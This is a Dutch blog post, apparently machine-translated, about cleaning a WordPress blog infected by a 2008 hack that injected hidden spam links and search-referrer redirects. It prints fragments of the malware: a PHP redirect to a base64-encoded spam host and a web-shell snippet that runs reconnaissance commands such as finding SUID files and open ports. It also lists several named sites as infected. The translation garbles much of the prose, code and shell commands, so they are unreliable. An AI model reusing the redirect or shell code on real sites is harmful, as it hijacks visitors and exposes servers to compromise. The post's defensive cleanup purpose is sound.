Blogosphere virus ... maar wat je me hebt aangedaan?

In de afgelopen maand heb ik ontvangen waarschuwingen virus in blog van sommige bezoekers. Aanvankelijk heb ik negeerde de waarschuwingen, omdat ik installeerde een vrij goede antivirus (Kaspersky AV 2009) En zelfs blog voor een lange tijd, ik heb nooit een virus alert (lang geleden .. zag ik iets vermoeden dat de eerste refresh verdwenen. Eindelijk ...).
Langzaam begon tot grote variaties zien bezoekersverkeerNa die onlangs gedaald gestaag verkeer en begon te worden meer en meer mensen vertellen me dat stealthsettings.com het virused. Gisteren kreeg ik van iemand een screenshot gedaan wanneer antivirus geblokkeerd een script op stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Het was behoorlijk overtuigend voor mij, dus ik alle bronnen doorzocht zetten. Het eerste idee dat bij me opkwam was te doen upgrade de laatste WordPress (2.5.1), maar niet voordat de oude script om alle bestanden van WordPress wilt verwijderen en back-up database. Deze procedure ongelijk is gesteld en waarschijnlijk niet lang hebben genomen om mijn zere sema waar, als ik gezegd zou hebben geven in een discussie over koffie, vond hij Google en het zou goed zijn om hem te zien.
MyDigitalLife.info, publiceerde een artikel met de titel: "WordPress Hack: Herstellen en Fix Google en Search Engine of Nee Cookie Verkeer doorgestuurd naar Your-Needs.info, AnyResults.Net, Golden-Info.net en andere illegale sites"Dat is het einde van de draad die ik nodig had.
Het gaat over een exploiteren WordPress op basis van cookiesWaarvan ik denk dat is zeer complex en maakte het boek. Slim genoeg om een ​​te maken SQL Injection Database blog, naar een onzichtbare gebruiker te maken een eenvoudige routine controle Dashboard->gebruikers, Controleer de server mappen en bestanden "schrijfbaar" (Met chmod 777), te zoeken en te uitvoeren bestanden met de privileges van de groep of de wortel. Ik weet niet wie gebruik maken van de naam en het zien dat er enkele artikelen geschreven over hem, ondanks het feit dat veel blogs zijn geïnfecteerd, waaronder Roemenië. Ok ... Ik zal proberen om te proberen om algemeenheden over het virus uit te leggen.

Wat is virus?

Plaats eerst de bronnen pagina's op blogs, links onzichtbaar voor bezoekers, maar zichtbaar en indexeerbaar voor zoekmachines, met name Google. Op deze manier overdracht Page Rank plaatsen aangeduid door de aanvaller. Tweede ingevoegd omleiding code URL voor bezoekers uit Google, Live, Yahoo, ... of een RSS-lezer en niet de site in koekje. Een antivirus detecteert de redirect als Trojan-Clicker.HTML.

Symptomen:

Verminderde enorme bezoekersverkeerVooral op blogs waar de meeste bezoekers vandaan komen Google.

Identificatie: (Vandaar compliceren het probleem voor degenen die niet weten hoe hoe phpmyadmin, php en linux)

LA. WAARSCHUWING! Maak eerst een back-up database!

1. Controleer de bronbestanden index.php, header.php, footer.php, Het thema van de blog en kijk of er een code die gebruikmaakt van codering base64 of bevat "if ($ ser ==" 1 && sizeof ($ _COOKIE) == 0?) "vorm:

$ Seref = array ("google", "msn", "leven", "altavista"
"Vraag", "yahoo", "AOL", "cnn", "weer", "alexa");
$ Ser = 0; foreach ($ Seref als $ ref)
if (strpos (strtolower
($ _SERVER ['HTTP_REFERER']), $ verw) == false) {$ ser = "1;? Break;}!
if ($ ser == "1 sizeof (&& $ _COOKIE) == 0?) {header (" Location: ". base64_decode (" ")." http:// YW55cmVzdWx0cy5uZXQ = / "); exit;
}?>

... Of zoiets. Verwijder deze code!

Klik op de foto ...

code index

In de afbeelding hierboven ik per ongeluk gekozen voor de "<Php get_header ();?>". Die code moet blijven.

2. Gebruiken phpMyAdmin en ga naar de database tabel wp_usersWaar controleren of er geen gebruikersnaam gemaakt op 00:00:00 0000-00-00 (Mogelijk in veld USER_LOGIN schrijven "WordPress". Let op de gebruikers-ID (veld ID) en verwijder het.

Klik op de foto ...

nep-gebruiker

* De groene lijn moet worden verwijderd en behield zijn ID. Bij Was ID = 8 .

3. Ga naar de tabel wp_usermeta, Waar je gelegen en verwijderen lijnen ID (waar het veld user_id ID-waarde wordt verwijderd).

4. In Tabel wp_option, Go active_plugins en zie wat plug-in is verdachte ingeschakeld. Het kan gebruikt worden als eindes _old.giff, _old.pngg, _old.jpeg, _new.php.giffEtc extensies combinaties met _old en _Nieuw valse beeld.

WAAR SELECT * FROM wp_options option_name = 'active_plugins'

Verwijder dit plugin, ga dan naar de blog -> Dashboard -> Plugins en activeer een plugin die uit te schakelen zeker.

Klik op de afbeelding om te zien lijkt het erop active_plugins virus bestand.

inpluggen

Volg het pad op de FTP of SSH, aangegeven in active_plugins en verwijder het bestand van de server.

5. Ook in phpMyAdmin in tabel wp_option, Zoek en verwijder de regel met "rss_f541b3abd05e7962fcab37737f40fad8'En'internal_links_cache ".
In internal_links_cache, aangeboden versleutelde spam links die worden weergegeven in een blog Google Adsense code, De hacker.

6. Wordt aanbevolen wachtwoord wijzigen Blog en login verwijder alle verdachte userele. Upgrade naar de nieuwste versie van WordPress en de blog niet de inschrijving van nieuwe gebruikers in te stellen. Er is geen verlies ... kunnen reageren en onlogisch.

Ik heb geprobeerd om boven de min of meer uit te leggen, wat te doen in een dergelijke situatie, om het virus blog te reinigen. Het probleem is ernstiger dan het lijkt en niet in de buurt opgelost, voor gebruik beveiligingsproblemen het hosten van de webserver, die blog.

Als eerste maatregel van veiligheid, met toegang SSH, Maak een aantal controles op de server om te zien of er bestanden zoals * _old * en * _Nieuw. * Met eindes.Giff,. jpeg,. pngg,. jpgg. Deze bestanden moeten worden verwijderd. Als u de naam van een bestand, bijvoorbeeld. top_right_old.giff in top_right_old.phpWe zien dat het bestand is precies de exploit code-server.

Enkele nuttige aanwijzingen voor controle, schoonmaak en beveiliging server. (Via SSH)

1. cd / tmp en controleer of er mappen, zoals tmpVFlma of verwijderen andere combinaties asemenatoare naam en het. Zie de screenshot hieronder, twee van dergelijke mappen voor mij:

tmpserver

rm-rf mapnaam

2. Controleer elimiati (veranderende chmod-mail) mappen met attributen als mogelijk chmod 777

vind alle schrijfbare bestanden in de huidige dir: Zoeken. -Type f-perm-2-ls
vind alle schrijfbare mappen in de huidige dir: Zoeken. -Type d-perm-2-ls
vind alle schrijfbare mappen en bestanden in de huidige dir: Zoeken. -Perm-2-ls

3. Op zoek naar verdachte bestanden op de server.

Zoeken. -Naam "* _new.php *"
Zoeken. -Naam "* _old.php *"
vinden. -name '* .jpgg "
vinden. -name '* _giff "
vinden. -name '* _pngg "

4, WAARSCHUWING! de bestanden die zijn ingesteld beetje SUID si SGID. Deze bestanden uit te voeren met de bevoegdheden van de gebruiker (groep) of wortel, niet de gebruiker die het bestand uit te voeren. Deze bestanden kunnen leiden tot wortel compromis, als veiligheidsvraagstukken. Als je niet de SUID en SGID bestanden te gebruiken met bits, uit te voeren 'chmod 0 " hen of verwijderen pakket die ze bevatten.

Wordt misbruikt ergens in de bron ...:

if (! $ safe_mode) {
if ($ os_type == 'nix') {
$ Os = Uitvoeren ("sysctl-n kern.ostype ').;
$ Os = Uitvoeren ("sysctl-n kern.osrelease ').;
$ Os = Uitvoeren ("sysctl-n kernel.ostype ').;
$ Os = Uitvoeren ("sysctl-n kernel.osrelease ').;
if (empty ($ user)) $ user = execute ('id');
$ Aliassen = array (
"=>"
"Vind suid bestanden '=>' find /-type f-perm-04000-ls ',
'Zoek sgid files' => 'find /-type f-perm-02000-ls',
'Zoek alle schrijfbare bestanden in de huidige dir' => 'te vinden. -Type f-perm-2-ls ',
'Zoek alle schrijfbare mappen in de huidige dir' => 'te vinden. -Type d-perm-2-ls ',
'Zoek alle schrijfbare mappen en bestanden in de huidige dir' => 'te vinden. -Perm-2-ls ',
'Toon open poorten' => 'netstat-an | grep-i luisteren',
);
Else {}
. $ Naam besturingssysteem = Uitvoeren ('ver');
$ Gebruiker = Uitvoeren ("echo% username% ').;
$ Aliassen = array (
"=>"
"Toon runing diensten '=>' net start '
'Toon lijst met processen' => 'tasklist'
);
}

Vindt op die manier ... in principe inbreuken op de beveiliging. Poorten openen directory "schrijfbaar" en de groep uitvoering privileges bestanden / root.

Terug met meer ...

Besmet sommige blogs: , ,

, , ,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

,
, www.itex.ro / blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

, Www.artistul.ro / blog /,

www.mirabilismedia.ro / blog, Blog.einvest.ro
... De lijst gaat maar door ... veel.

U kunt controleren of een blog is het virus met Google-zoekmachine. kopiëren en plakken:

Site: www.blegoo.com kopen

Goedenacht en verhoog tot ;) werken Binnenkort kom ik naar Eugene nieuws op prevezibil.imprevizibil.com.

brb :)

OM: LET OP! WordPress thema wijziging of upgrade naar WordPress 2.5.1, geen oplossing om zich te ontdoen van dit virus.

Blogosphere virus ... maar wat je me hebt aangedaan?

Over de auteur

heimelijkheid

Gepassioneerd door alles wat gadgets en IT betekent, schrijf ik met plezier stealthsettings.com van 2006 en ik ontdek graag nieuwe dingen over computers en besturingssystemen macOS, Linux, Windows, iOS en Android.

Laat een bericht achter